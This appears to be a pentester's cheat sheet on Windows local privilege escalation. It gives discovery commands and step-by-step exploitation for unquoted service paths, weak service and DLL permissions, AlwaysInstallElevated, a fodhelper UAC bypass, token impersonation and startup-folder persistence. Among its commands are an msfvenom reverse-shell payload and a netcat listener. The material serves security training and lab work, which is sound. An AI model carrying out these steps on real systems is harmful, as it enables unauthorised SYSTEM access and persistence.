1 AD Pentesting - Windows/Local Privilege Escalation

#	Technique Name	Description
1	Unquoted Service Path	Exploit unquoted paths to execute attacker’s binary as SYSTEM
2	Insecure Service Permissions	Writable service binary/config or folders lead to privilege gain
3	DLL Hijacking in Services	Drop DLL in searched path loaded by a high-privilege service
4	Insecure Registry Permissions	Modifiable registry keys controlling service paths
5	Privileged Scheduled Tasks	SYSTEM tasks writable or replaceable by local user
6	AlwaysInstallElevated (MSI Abuse)	Misconfigured Windows Installer policy allows SYSTEM MSI installs
7	UAC Bypass (fodhelper, eventvwr, etc.)	Trusted binaries auto-elevate without prompt, abused to bypass UAC
8	Token Impersonation (SeImpersonate)	Impersonate privileged tokens via named pipes (e.g., PrintSpoofer)
9	Named Pipe Impersonation	SYSTEM service talks over pipe, attacker hijacks impersonation
10	Startup Folder Abuse	Place payload in startup folder to auto-run on login
11	GPP Passwords	Steal plaintext admin passwords from SYSVOL XML files
12	Credential Dumping + Token Reuse	Dump credentials from LSASS/SAM and reuse them (PtH, Over-PtH)
13	Executable in PATH Overwrite	Drop malicious binary where a service/app calls it from PATH
14	Weak Folder Permissions	Replace or modify privileged service files or script in loose folders
15	Registry AutoRun Backdoors	Abuse AutoRun/RunOnce keys to persist or elevate

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1. Unquoted Service Path

---

Objective:

Exploit services with unquoted paths containing spaces, gaining code execution as SYSTEM.

---

1️⃣ Discovery – How to Find Vulnerable Services

---

🔹 Method 1: WMIC (Caution: Auto may miss demand-start)

cmd

wmic service get name,displayname,pathname,startmode

⚠️ Do not rely only on | findstr "Auto" — it will miss services with StartMode = Demand.

✅ Use full output and visually inspect all services.

---

🔹 Method 2: PowerShell (Full list, filters unquoted + spaced paths)

powershell

Get-WmiObject win32_service | Where-Object {
  $_.PathName -notmatch '^".*"$' -and
  $_.PathName -match " "
} | Select-Object Name, StartMode, StartName, PathName

• ✅ Finds both Auto-start and Demand-start services

• ✅ Filters for unquoted and space-containing paths

---

🔹 Method 3: winPEAS (Automated)

Run:

winPEASany.exe

Look under:

[+] Unquoted service paths

✅ Lists all vulnerable services regardless of start type

---

2️⃣ Checklist Per Service (What to Verify)

Check	Command
Path is unquoted	sc qc <servicename> → BINARY_PATH_NAME
Path contains spaces	Visually confirm
Service runs as SYSTEM	SERVICE_START_NAME = LocalSystem
Any folder in path is writable	icacls or accesschk.exe
File to hijack does not exist already	dir, where, test path

3️⃣ Exploitation – Manual Steps

---

Step 1: Understand Search Order

For:

makefile

C:\Program Files\Vuln Service\svc.exe

Windows checks:

1. C:\Program.exe

2. C:\Program Files\Vuln.exe

3. C:\Program Files\Vuln Service.exe

4. ✅ If any exists, it runs before the actual:
   C:\Program Files\Vuln Service\svc.exe

---

Step 2: Drop Exploit Binary (Reverse Shell or Test EXE)

bash

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o Vuln Service.exe

Drop to:

cmd

C:\Program Files\

(if that folder is writable and Vuln Service.exe is the matched path)

---

Step 3: Trigger the Service

A. If it's Auto-start:

• Reboot the system

• Payload will run at boot

B. If it's Demand-start (most common in labs):

Run as low-priv user:

sc start <servicename>

---

Step 4: Confirm SYSTEM Shell

Listener should receive a connection:

nc -lvnp 4444

Then:

whoami

nt authority\system

---

4️⃣ Variants and Edge Cases

Variant	Description
Auto-start	Payload runs at reboot
Demand-start	Must be manually started by attacker
Writable folder + no file exists	Place matching EXE in the search order
Service binary already exists at earlier path	Exploit not possible without deleting original file
Path has no spaces or is quoted	Not vulnerable
Service doesn’t run as SYSTEM	Escalation may not be impactful

---

2. Insecure Service Permissions

---

🛠️ You find a service owned by SYSTEM, but guess what? You (a normal user) can replace the .exe file!
Now, when the service starts — it runs your payload instead of the original binary.

Steps:

• Find modifiable services:
  accesschk.exe -uwcqv "Users" *

• Replace the service binary with your malicious payload

• Restart the service using sc stop / sc start

• Catch SYSTEM shell when the service executes your payload

---

3. DLL Hijacking in Services

---

🎣 Some services load DLLs from relative paths like .\ or C:\Program Files\App\ — and they don’t check signatures.
You drop a malicious DLL with the expected name in a writable directory. Boom — it loads yours!

Steps:

• Use ProcMon to trace missing DLLs loaded by service

• Identify search path folders you can write to

• Create DLL payload and name it as the missing DLL

• Drop DLL into writable folder

• Restart the service or trigger DLL load

---

4. AlwaysInstallElevated

---

📦 Windows has a weird legacy feature: if two registry keys are set to 1 — any .MSI file you run gets SYSTEM power.
You become SYSTEM by packaging your shell into an .msi file. Old school, but still fun!

Steps:

• Check these registry keys:
  reg query HKCU\Software\Policies\Microsoft\Windows\Installer\
reg query HKLM\Software\Policies\Microsoft\Windows\Installer\
  ✅ Both must be set to 1

• Generate malicious .msi with msfvenom or msbuild

• Run:
  msiexec /quiet /i yourfile.msi

• 💥 SYSTEM shell pops

5. UAC Bypass (fodhelper, eventvwr, etc.)

---

🔓 UAC tries to stop you from going admin, but Microsoft trusts some signed apps to auto-elevate without prompting.
🥷 You trick one (like fodhelper.exe) into launching your command by hijacking a registry key it reads when it starts.
No UAC prompt, no password — just SYSTEM power through the front door.

Steps:

• Set registry key:
  reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe" /f

• Add DelegateExecute key:
  reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /f

• Run: fodhelper.exe

• Result: cmd.exe runs elevated without UAC prompt

---

6. Token Impersonation (SeImpersonatePrivilege)

---

🎭 Some services let you wear someone else's mask if you have SeImpersonatePrivilege.
🪄 Tools like JuicyPotato, PrintSpoofer, or RoguePotato let you grab a SYSTEM token and run your own command as SYSTEM.

Steps:

• Check privilege:
  whoami /priv → look for SeImpersonatePrivilege

• Download and run PrintSpoofer or JuicyPotato

• Set up reverse shell or command in tool arguments

• Run exploit and gain SYSTEM shell

---

7. Named Pipe Impersonation

---

📡 Some services talk over named pipes — you hijack the pipe, pretend to be the server, and steal SYSTEM’s identity.
🥷 Then you impersonate the SYSTEM token and spawn a shell as the king.

Steps:

• Create a named pipe listener

• Start a malicious service that connects to it

• Hijack connection and impersonate token

• Launch SYSTEM shell from impersonated token

---

8. Startup Folder Abuse

---

🚪 Anything you drop into the Startup folder will run the next time someone logs in.
If you have write access — drop a payload, wait for a reboot or login, and enjoy the ride.

Steps:

• Navigate to:
  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

• Drop payload (.exe, .bat, or shortcut) that runs your command

• Log off or reboot system

• Payload runs with user/session privileges